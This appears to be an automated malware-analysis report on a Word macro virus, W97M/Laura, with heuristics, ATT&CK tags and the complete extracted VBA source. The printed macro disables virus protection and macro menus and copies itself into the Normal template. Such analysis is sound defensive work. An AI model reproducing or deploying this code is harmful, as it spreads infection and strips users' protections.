MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to modify application settings and displays a message box with the text 'Laura, I love you.' The heuristic 'ClamAV: Doc.Trojan.Laura-1' and the presence of 'Total Konfuzion' in the document body and script strongly suggest the 'Laura' family. The macro also checks and potentially modifies a registry key related to virus protection.
Heuristics (3)
- ClamAV: Doc.Trojan.Laura-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Laura-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2711 bytes |

SHA-256: de7377cdea32dae3c957ec83ede6d76787d5e6192a2b8592a172269846f1bf73
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Laura()
    t = "W97M/Laura"
    l = " Laura, I love you. "
    m = " -Total Konfuzion-"
    If Day(17) Then
        MsgBox l & vbCr & vbCr & m, vbSystemModal, t
        ActiveDocument.Shapes.AddTextEffect(msoTextEffect8, "Laura, I love you.", "Comic Sans MS", 36#, msoFalse, msoFalse, 155.6, 176.6).Select
        CommandBars("WordArt").Visible = (Rnd * 0)
        Beep
    End If
End Sub
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        t = "W97M/Laura"
        l = "Laura, I love you."
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
            .SavePropertiesPrompt = (Rnd * 0)
        End With
        With Application
            .EnableCancelKey = wdCancelDisabled
            .UserName = "Total Konfuzion"
            .UserInitials = "TK"
            .UserAddress = t & vbCr & l
        End With
        CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
        CommandBars("Tools").Controls("Templates and Add-ins...") = (Rnd * 0)
        CommandBars("Format").Controls("Style Gallery...") = (Rnd * 0)
        With Dialogs(wdDialogFileSummaryInfo)
            .Author = "Total Konfuzion"
            .Subject = "W97M/Laura"
            .Comments = "Laura, I love you"
            .Keywords = "-Total Konfuzion-"
            .Execute
        End With
        StatusBar = l
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        Call Laura
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    End If
    ' W97M/Laura
    ' by: Total Konfuzion
    ' Just to express my true love
    ' for you darling.. xxx
End Sub
Sub HelpAbout()
    t = "W97M/Laura"
    m = " -Total Konfuzion-"
    Application.Caption = t & " - " & "Laura, I love you."
    MsgBox " " & t & vbCr & vbCr & m, vbSystemModal, t
    Dialogs(wdDialogHelpAbout).Show
End Sub
```